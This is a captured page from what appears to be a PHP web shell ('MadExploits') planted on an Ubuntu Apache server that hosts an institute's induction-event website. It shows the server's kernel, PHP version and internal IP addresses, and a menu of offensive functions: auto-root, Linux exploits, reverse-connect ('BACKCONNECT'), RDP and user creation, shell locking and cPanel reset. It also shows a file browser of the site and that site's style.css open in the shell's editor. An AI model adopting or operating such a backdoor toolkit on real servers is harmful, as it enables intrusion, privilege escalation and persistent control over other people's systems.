Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
induction /
[ HOME SHELL ]
Name
Size
Permission
Action
.git
[ DIR ]
drwxr-xr-x
Avatar_Page
[ DIR ]
drwxr-xr-x
Contact Page
[ DIR ]
drwxr-xr-x
HamburgerPage
[ DIR ]
drwxr-xr-x
Images
[ DIR ]
drwxr-xr-x
artist
[ DIR ]
drwxr-xr-x
crew
[ DIR ]
drwxr-xr-x
schedule
[ DIR ]
drwxr-xr-x
index.html
9.68
KB
-rw-r--r--
style.css
15.57
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : style.css
html, body { margin: 0; padding: 0; height: 100%; width: 100%; line-height: 1.5; font-size: 16px; background-color: #000; overflow-x: hidden; box-sizing: border-box; font-family: 'Teachers', sans-serif; } body { overflow-x: hidden; word-wrap: break-word; } h1, h2, h3, h4, h5, h6 { font-size: clamp(1.2rem, 2vw, 2.5rem); /* scales between 1.2rem and 2.5rem based on screen */ } header { position: fixed; top: 0; left: 0; width: 100%; height: 60px; background: #000; color: white; display: flex; align-items: center; justify-content: space-between; padding: 0 20px; box-sizing: border-box; z-index: 10; } header a {color:#fff; text-decoration: none;} /* Unvisited link */ header a:visited {color:#fff;} /* Visited link */ header a:hover {color:#fff;} /* Mouse over link */ header a:active {color:#fff;} /* Selected link */ .hamburger { font-size: 24px; cursor: pointer; } .logo { flex: 1; display: flex; justify-content: center; height: 40px; } .logo { height: 60px; /* or whatever your header height is */ margin-left: 1vw; /* for left spacing as you mentioned */ display: flex; align-items: center; } .logo a { display: inline-block; height: 100%; } .logo img { height: 100%; width: auto; object-fit: contain; } .schedule { font-style: bold; font-size: 21px; cursor: pointer; display: flex; align-items: center; gap: 1vw; font-size: 1rem; } .schedule { font-size: 0.9rem; flex-shrink: 1; white-space: nowrap; } .home { position: relative; width: 100%; height: 100%; overflow: hidden; /* margin-top: 60px; Adjusted for header height */ /* background-image: url("Images/MAIN.svg"); background-repeat: no-repeat; background-position: 0 60px; background-size: cover; */ } .home .main-img { margin-top: 60px; position: absolute; top: 50%; left: 50%; width: 100vw; height: 100vh; object-fit:fill; transform: translate(-50%, -50%); /* z-index: -1; */ } .home .title-img{ position: absolute; top: 5vh; left: 50%; transform: translateX(-50%); width: 90vw; max-width: 700px; height: auto; } .about-container { display: flex; flex-wrap: wrap; justify-content: center; align-items: center; background-image: url('Images/bg-about-footer.png'); background-repeat: repeat; background-position: center; background-size: cover; color: white; position: relative; width: 100%; box-sizing: border-box; overflow: visible; /* changed from hidden to allow full content display */ max-width: 100%; padding: 1rem; overflow-wrap: break-word; word-break: break-word; white-space: normal; height: calc(100vh - 50px); } .about-container::before { content: ""; position: absolute; top: 2%; left: 2%; right: 2%; bottom: 2%; border: 1px solid #C4C4C4; pointer-events: none; z-index: 1; } .left-column { flex: 1; background-image: url('Images/iiitdAbout.png'); background-size: 100% auto; height: 100%; background-repeat: repeat-y; background-position: center; display: flex; margin-left: 5vh; align-items: flex-start; justify-content: center; padding: 2vh 1vw; } .space-station { margin-top: 30vh; width: 100%; max-width: 200px; height: auto; } .right-column { flex: 2; display: flex; flex-direction: column; justify-content: flex-start; margin-top: 5vh; margin-right: 5vh; } .title-img { width: 100%; max-width: 500px; margin-top: 5vh; height: auto; align-self: center; } .description { margin-top: 2vh; line-height: 1.6; text-align: justify; padding: 1rem; max-width: 600px; margin: 0 auto; font-size: clamp(0.9rem, 1.5vw, 1.2rem); word-break: break-word; } .keynote-speakers-page { width: 100%; background-color: #FFEBD4; /* padding: 0vh 0 4vh; */ box-sizing: border-box; overflow: hidden; background-image: url('Images/keybg.png'); background-repeat: repeat; /* background-position: center; */ text-align: center; padding: 4rem 1rem; height: auto; background-size: cover; } .keynote-heading { display: flex; justify-content: center; align-items: center; gap: 1rem; position: relative; top: 9vh; flex-wrap: wrap; width: 100%; margin-bottom: 10vh; } .keynote-icon { width: 8vw; max-width: 60px; height: auto; } .heading-image { width: 40vw; max-width: 500px; height: auto; } .keynote-speakers-page .greet-keynote-speakers-text { position: relative; width: 60vw; margin: 5vh auto 0 auto; /* top margin + horizontal centering */ font-size: 1.2rem; text-align: center; } .slider-container { display: flex; flex-direction: column; align-items: center; width: 100%; padding: 2vh 4vw; box-sizing: border-box; /* gap: 0; */ gap: 2rem; margin-top: 2rem; } .slides-row { display: flex; justify-content: center; flex-wrap: wrap; width: 100%; box-sizing: border-box; /* gap: 0; */ gap: 1.5rem; } .slide { position: relative; width: 18vw; max-width: 200px; min-width: 120px; height: auto; overflow: hidden; transition: transform 0.3s ease; } .slide-inner { width: 100%; height: 100%; } .slide img { width: 100%; height: auto; display: block; object-fit: cover; transition: transform 0.3s ease; } .slide:hover img { transform: scale(1.05); } .hover-text { position: absolute; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0, 0, 0, 0.7); color: #fff; display: flex; flex-direction: column; align-items: center; justify-content: center; opacity: 0; transition: opacity 0.3s ease; padding: 0.5rem; box-sizing: border-box; text-align: center; word-wrap: break-word; overflow-wrap: break-word; white-space: normal; z-index: 2; } .slide:hover .hover-text { opacity: 1; } .hover-text .name { font-weight: bold; margin: 0; font-size: 1rem; } .hover-text .designation { font-size: 0.9rem; margin-top: 4px; } .hover-text .name, .hover-text .designation { margin: 0.2rem 0; font-size: clamp(0.8rem, 2.5vw, 1rem); line-height: 1.3; padding: 0 0.5rem; word-break: break-word; } .slide:hover { transform: scale(1.05); } .image-wrapper { position: relative; height: 0; } .floating-institute { position: absolute; left: 40px; top: -19vh; width: 40vw; max-width: 40vh; z-index: 5; } .floating-satalight { position: absolute; right: -25px; top: -60px; width: 10vw; z-index: 5; } .slide-inner { position: relative; width: 100%; height: 100%; overflow: hidden; } .hover-text { position: absolute; inset: 0; /* shorthand for top: 0; right: 0; bottom: 0; left: 0 */ background: rgba(0, 0, 0, 0.7); color: #fff; display: flex; flex-direction: column; justify-content: center; align-items: center; opacity: 0; transition: opacity 0.3s ease; text-align: center; padding: 0.5rem; box-sizing: border-box; word-break: break-word; z-index: 2; overflow-wrap: break-word; } @media (max-width: 768px) { .about-container .left-column { display: none; } .right-column { background-image: url('Images/iiitdAbout.png'); background-repeat: repeat-y; background-position: center; background-size: 100% auto; height:100%; align-items: center; /* horizontally center children */ justify-content: center; /* vertically center children */ margin: 0; width: 100%; } .about-container { flex-direction: column; padding: 2rem 1rem; height: auto; } .description { padding: 1rem; margin-top: 1rem; font-size: 1rem; } .floating-institute { left: 10px; top: -7vh; width: 30vw; max-width: 20vh; } .floating-satalight { right: -5; top: -30px; /* width: 6vw; */ } } @media (max-width: 900px) and (max-height: 500px), (max-width: 500px) { .home { height: 50vh; } .home .main-img { height: 50vh; } .home .date-induction { top: 43vh; left: 48vw; } .home .scroll-img { display: none; } .about-container .welcome-iiitd { margin-top: 4vh; } .about-container p { font-size: 15px; margin-left: 0; margin-top: 0; padding: 16px; } .about-container{ min-height: calc(100vh - 40px); /* allows it to grow beyond screen height if needed */ } .about-container .left-column { display: none; } .right-column { background-image: url('Images/iiitdAbout.png'); background-repeat: repeat-y; background-position: center; background-size: 100% auto; height:100%; align-items: center; /* horizontally center children */ justify-content: center; /* vertically center children */ } .keynote-speakers-page { min-height: 100vh; height: auto; overflow-y: auto; padding-bottom: 5vh; /* background-size: cover; */ } .keynote-speakers-page .greet-keynote-speakers-text { font-size: medium; width: 90vw; text-align: center; margin: 5vh auto 0 auto; /* top margin + horizontal centering */ } .heading-image { width: 60vw; max-width: 500px; height: auto; } .slider-container { margin-top: 4vh; padding-bottom: 2vh; display: flex; flex-direction: column; align-items: center; gap: 2vh; } .slides-row { flex-wrap: wrap; justify-content: center; gap: 2vw; } .slide { width: 40vw; max-width: 160px; height: auto; min-width: 49%; } .slide img { width: 100%; height: auto; object-fit: contain; display: block; max-height: 35vh; } .other-speakers-page { height: 80vh; } .other-speakers-page .greet-other-speakers-text { font-size: smaller; width: 60vw; } .quote-used-page { height: 50vh; } } @media (max-height: 500px) { .keynote-speakers-page { min-height: 100vh; height: auto; overflow-y: auto; padding-bottom: 5vh; /* background-size: cover; */ } .about-container{ height: auto; } .keynote-speakers-page .greet-keynote-speakers-text { font-size: medium; width: 90vw; margin: 5vh auto 0 auto; /* top margin + horizontal centering */ } .slider-container { margin-top: 4vh; padding-bottom: 2vh; display: flex; flex-direction: column; align-items: center; gap: 2vh; } .slides-row { flex-wrap: wrap; justify-content: center; gap: 2vw; } .slide { width: 40vw; max-width: 160px; height: auto; } .slide img { width: 100%; height: auto; object-fit: contain; display: block; max-height: 35vh; } .prev, .next { top: 90%; } .hover-text .name { font-size: 0.85rem; } .hover-text .designation { font-size: 0.75rem; } } @media (max-width: 500px) { .about-container{ min-height: auto; } .schedule { font-size: 0.75rem; gap: 0.5rem; } header { padding: 0 10px; } } @media (max-width: 500px) { .hover-text { font-size: 0.8rem; padding: 0.8rem; } .slide { width: 45vw; } } .footer { background-color: #0B0B0B; padding: 20px; color: white; background-image: url('Images/bg-about-footer.png'); background-repeat: repeat; background-position: center; background-size: cover; /* margin-left: 2vw; */ } .footer .footer-down{ display: flex; flex-wrap: wrap; margin-left: 4.5vw; width: 100%; } .footer-text, .footer-contact{ flex: 1 1 45%; height: 100%; } .footer-social{ flex-basis: 100%; height: 100px; margin-top: 10px; text-align: center; } .footer-content { display: flex; justify-content: space-between; align-items: center; flex-wrap: wrap; } .footer-content .footer-image .induction-25{ position: relative; width: 87vw; height: auto; left: 5vw; margin: 2vh 0; } .footer-content .footer-image .iiitd-logo{ width: 40vw; margin-left: 4.5vw; } .footer-content .footer-image .avatar{ width: 30vw; margin-left: 4.5vw; } .footer-text { margin-right: 20px; } .footer-text h1 { font-size: 48px; margin: 0; } .footer-text p { margin: 5px 0; } .footer-contact { position: relative; top: -7vh; } .footer-contact p { margin: 5px 0; } .footer-contact span { display: inline-block; width: 60px; font-weight: bold; } .footer-social a img { width: 24px; height: 24px; } .footer-text a{ color: #fff; } .footer-social a { text-decoration: none; color: #fff; } .footer-social i { font-size: x-large; } .footer-contact i{ margin-right: 1vw; font-size: x-large; } @media ((max-width :900px) and (max-height:500px)) or (max-width:500px) { .footer .footer-down{ font-size: smaller; } .footer .footer-image .iiitd-logo{ width: 70vw; } .footer .footer-image .avatar{ width: 50vw; } .footer-contact{ top: -2vh; } .footer-contact i{ font-size: large; } .footer-social i{ font-size: large; } .footer-social{ top: 15vh; } .footer-content .footer-image .induction-25{ left: 2vw; }} @media (max-width: 480px) { .footer-down { flex-direction: column; } .footer-text, .footer-contact, .footer-social { flex-basis: 100% !important; min-width: 100% !important; height: auto; /* optional to allow height to grow naturally */ } } .footer-contact p { display: flex; flex-wrap: wrap; gap: 0.5rem; margin: 0.5rem 0; align-items: center; } .footer-contact i { margin-right: 0.5rem; min-width: 1.2rem; } .name-wrapper { display: inline; white-space: normal; word-break: break-word; } .footer-contact .label { font-weight: 600; } .footer-contact .info { white-space: normal; word-break: break-word; flex: 1; } @media (max-width: 680px) { .logo { height: 45px; } }
Close